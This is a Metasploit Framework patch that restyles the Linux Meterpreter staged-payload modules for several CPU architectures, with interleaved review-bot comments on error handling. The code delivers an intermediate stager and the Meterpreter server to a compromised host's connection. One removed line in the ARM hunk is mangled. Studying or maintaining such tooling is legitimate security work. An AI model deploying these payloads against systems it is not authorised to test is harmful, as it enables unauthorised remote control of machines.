From 21bede1166d69f292cadb9efde240b110824b5c0 Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Tue, 5 Jul 2016 03:33:25 -0500
Subject: [PATCH] unify stager style
---
 modules/payloads/stages/linux/armle/mettle.rb | 38 +++++------
 .../payloads/stages/linux/mipsbe/mettle.rb | 64 ++++++-------
 .../payloads/stages/linux/mipsle/mettle.rb | 64 ++++++-------
 modules/payloads/stages/linux/x64/mettle.rb | 1 +
 modules/payloads/stages/linux/x86/mettle.rb | 1 +
 5 files changed, 59 insertions(+), 109 deletions(-)
diff --git a/modules/payloads/stages/linux/armle/mettle.rb b/modules/payloads/stages/linux/armle/mettle.rb
index 83e348bbbf..0faed424b9 100644
--- a/modules/payloads/stages/linux/armle/mettle.rb
+++ b/modules/payloads/stages/linux/armle/mettle.rb
@@ -11,22 +11,25 @@ module MetasploitModule
 include Msf::Sessions::MeterpreterOptions
 def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Linux Meterpreter',
- 'Description' => 'Inject the mettle server payload (staged)',
- 'Author' => [
- 'Adam Cammack 'linux',
- 'Arch' => ARCH_ARMLE,
- 'License' => MSF_LICENSE,
- 'Session' => Msf::Sessions::Meterpreter_armle_Linux))
+ super(
+ update_info(
+ info,
+ 'Name' => 'Linux Meterpreter',
+ 'Description' => 'Inject the mettle server payload (staged)',
+ 'Author' => [
+ 'Adam Cammack '
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_ARMLE,
+ 'License' => MSF_LICENSE,
+ 'Session' => Msf::Sessions::Meterpreter_armle_Linux
+ )
+ )
 end
 def elf_ep(payload)
 elf = Rex::ElfParsey::Elf.new(Rex::ImageSource::Memory.new(payload))
- ep = elf.elf_header.e_entry
- return ep
+ elf.elf_header.e_entry
 end
 def handle_intermediate_stage(conn, payload)
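Review bot: `elf_ep` is rewritten without any documentation, so a reader has to know Rex::ElfParsey to tell what the integer it now returns as its last expression means. A short YARD header would make the contract explicit, e.g. `# @param payload [String] raw ELF image to inspect` and `# @return [Integer] the e_entry field of the image's ELF header`. The mipsbe and mipsle hunks below make the identical change to `elf_ep` and would take the same header.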
@@ -70,15 +73,12 @@ module MetasploitModule
 entry_offset
 ].pack('V*')
- print_status("Transmitting intermediate stager for over-sized stage...(#{midstager.length} bytes)")
-
- conn.put [midstager.length].pack('V')
- conn.put midstager
-
- true
+ vprint_status("Transmitting intermediate stager...(#{midstager.length} bytes)")
+ conn.put([midstager.length].pack('V'))
+ conn.put(midstager) == midstager.length
 end
- def generate_stage(opts={})
+ def generate_stage(_opts = {})
 MetasploitPayloads::Mettle.read('arm-linux-musleabi', 'mettle.bin')
 end
 end
diff --git a/modules/payloads/stages/linux/mipsbe/mettle.rb b/modules/payloads/stages/linux/mipsbe/mettle.rb
index 555f36687f..a8e44b2ec3 100644
--- a/modules/payloads/stages/linux/mipsbe/mettle.rb
+++ b/modules/payloads/stages/linux/mipsbe/mettle.rb
@@ -12,22 +12,25 @@ module MetasploitModule
 include Msf::Sessions::MeterpreterOptions
 def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Linux Meterpreter',
- 'Description' => 'Inject the mettle server payload (staged)',
- 'Author' => [
- 'Adam Cammack '
- ],
- 'Platform' => 'linux',
- 'Arch' => ARCH_MIPSBE,
- 'License' => MSF_LICENSE,
- 'Session' => Msf::Sessions::Meterpreter_mipsbe_Linux))
+ super(
+ update_info(
+ info,
+ 'Name' => 'Linux Meterpreter',
+ 'Description' => 'Inject the mettle server payload (staged)',
+ 'Author' => [
+ 'Adam Cammack '
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_MIPSBE,
+ 'License' => MSF_LICENSE,
+ 'Session' => Msf::Sessions::Meterpreter_mipsbe_Linux
+ )
+ )
 end
 def elf_ep(payload)
- elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) )
- ep = elf.elf_header.e_entry
- return ep
+ elf = Rex::ElfParsey::Elf.new(Rex::ImageSource::Memory.new(payload))
+ elf.elf_header.e_entry
 end
 def handle_intermediate_stage(conn, payload)
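Review bot: The result of `conn.put([midstager.length].pack('V'))` is discarded, so only the second write is checked: if the 4-byte length prefix is written short, the method still returns true as long as the body write completes, and the receiving side presumably then reads a truncated length ahead of the stager. Checking the prefix the same way as the body, `return false unless conn.put([midstager.length].pack('V')) == 4`, keeps the two writes consistent with the new boolean contract. `handle_intermediate_stage` and the array that `].pack('V*')` closes begin outside the hunk.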
@@ -83,40 +86,11 @@ module MetasploitModule
 0
 ].pack('N*')
- print_status("Transmitting intermediate stager for over-sized stage...(#{midstager.length} bytes)")
- conn.put(midstager)
-
- true
+ vprint_status("Transmitting intermediate stager...(#{midstager.length} bytes)")
+ conn.put(midstager) == midstager.length
 end
- def generate_stage(opts={})
- meterpreter = generate_meterpreter
- #config = generate_config(opts)
- #meterpreter + config
- end
-
- def generate_meterpreter
+ def generate_stage(_opts = {})
 MetasploitPayloads::Mettle.read('mips-linux-muslsf', 'mettle.bin')
 end
-
- def generate_config(opts={})
- opts[:uuid] ||= generate_payload_uuid
-
- # create the configuration block, which for staged connections is really simple.
- config_opts = {
- :arch => opts[:uuid].arch,
- :exitfunk => nil,
- :expiration => datastore['SessionExpirationTimeout'].to_i,
- :uuid => opts[:uuid],
- :transports => [transport_config(opts)],
- :extensions => [],
- :ascii_str => true
- }
-
- # create the configuration instance based off the parameters
- config = Rex::Payloads::Meterpreter::Config.new(config_opts)
-
- # return the binary version of it
- config.to_b
- end
 end
diff --git a/modules/payloads/stages/linux/mipsle/mettle.rb b/modules/payloads/stages/linux/mipsle/mettle.rb
index f80684251c..d49c92016e 100644
--- a/modules/payloads/stages/linux/mipsle/mettle.rb
+++ b/modules/payloads/stages/linux/mipsle/mettle.rb
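Review bot: `handle_intermediate_stage` now returns `conn.put(midstager) == midstager.length` instead of an unconditional `true`, but nothing states that the boolean means the whole stager was written, and a false result is silent: the only message printed is the status line before the write. A comment on the return line, `# true only if the entire intermediate stager was written to conn`, would document the contract, and a `vprint_error` on the short-write path is worth considering if the caller does not report the failure itself. The mipsle hunk below has exactly the same shape and would take the same comment. The method's header and the array that `].pack('N*')` closes are outside the hunk.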
@@ -12,22 +12,25 @@ module MetasploitModule
 include Msf::Sessions::MeterpreterOptions
 def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Linux Meterpreter',
- 'Description' => 'Inject the mettle server payload (staged)',
- 'Author' => [
- 'Adam Cammack '
- ],
- 'Platform' => 'linux',
- 'Arch' => ARCH_MIPSLE,
- 'License' => MSF_LICENSE,
- 'Session' => Msf::Sessions::Meterpreter_mipsle_Linux))
+ super(
+ update_info(
+ info,
+ 'Name' => 'Linux Meterpreter',
+ 'Description' => 'Inject the mettle server payload (staged)',
+ 'Author' => [
+ 'Adam Cammack '
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_MIPSLE,
+ 'License' => MSF_LICENSE,
+ 'Session' => Msf::Sessions::Meterpreter_mipsle_Linux
+ )
+ )
 end
 def elf_ep(payload)
- elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) )
- ep = elf.elf_header.e_entry
- return ep
+ elf = Rex::ElfParsey::Elf.new(Rex::ImageSource::Memory.new(payload))
+ elf.elf_header.e_entry
 end
 def handle_intermediate_stage(conn, payload)
@@ -83,40 +86,11 @@ module MetasploitModule
 0
 ].pack('V*')
- print_status("Transmitting intermediate stager for over-sized stage...(#{midstager.length} bytes)")
- conn.put(midstager)
-
- true
+ vprint_status("Transmitting intermediate stager...(#{midstager.length} bytes)")
+ conn.put(midstager) == midstager.length
 end
- def generate_stage(opts={})
- meterpreter = generate_meterpreter
- #config = generate_config(opts)
- #meterpreter + config
- end
-
- def generate_meterpreter
+ def generate_stage(_opts = {})
 MetasploitPayloads::Mettle.read('mipsel-linux-muslsf', 'mettle.bin')
 end
-
- def generate_config(opts={})
- opts[:uuid] ||= generate_payload_uuid
-
- # create the configuration block, which for staged connections is really simple.
- config_opts = {
- :arch => opts[:uuid].arch,
- :exitfunk => nil,
- :expiration => datastore['SessionExpirationTimeout'].to_i,
- :uuid => opts[:uuid],
- :transports => [transport_config(opts)],
- :extensions => [],
- :ascii_str => true
- }
-
- # create the configuration instance based off the parameters
- config = Rex::Payloads::Meterpreter::Config.new(config_opts)
-
- # return the binary version of it
- config.to_b
- end
 end
diff --git a/modules/payloads/stages/linux/x64/mettle.rb b/modules/payloads/stages/linux/x64/mettle.rb
index 010e66788f..e5f78d9aee 100644
--- a/modules/payloads/stages/linux/x64/mettle.rb
+++ b/modules/payloads/stages/linux/x64/mettle.rb
@@ -81,6 +81,7 @@ module MetasploitModule
 add rsi, rax
 jmp rsi
 )
+ midstager = Metasm::Shellcode.assemble(Metasm::X64.new, midstager_asm).encode_string
 vprint_status("Transmitting intermediate stager...(#{midstager.length} bytes)")
 conn.put(midstager) == midstager.length
diff --git a/modules/payloads/stages/linux/x86/mettle.rb b/modules/payloads/stages/linux/x86/mettle.rb
index 93552c4d16..2b70f7892c 100644
--- a/modules/payloads/stages/linux/x86/mettle.rb
+++ b/modules/payloads/stages/linux/x86/mettle.rb
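Review bot: The `midstager` assigned on the added line in the x64 hunk is undocumented, and as far as I can tell the Metasm assemble step is the one statement in this method that fails by raising rather than by returning a value, so the boolean from `conn.put(midstager) == midstager.length` on the last line does not cover it. A one-line comment above the assignment, `# Assemble the intermediate stager listing above into machine code for this CPU`, would make the step and the variable's origin clear. The x86 hunk below adds the same line with `Metasm::X86.new` and would take the same comment. `midstager_asm` and the start of `handle_intermediate_stage` are outside both hunks.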
@@ -84,6 +84,7 @@ module MetasploitModule
 add edx, eax
 jmp edx
 )
+ midstager = Metasm::Shellcode.assemble(Metasm::X86.new, midstager_asm).encode_string
 vprint_status("Transmitting intermediate stager...(#{midstager.length} bytes)")
 conn.put(midstager) == midstager.length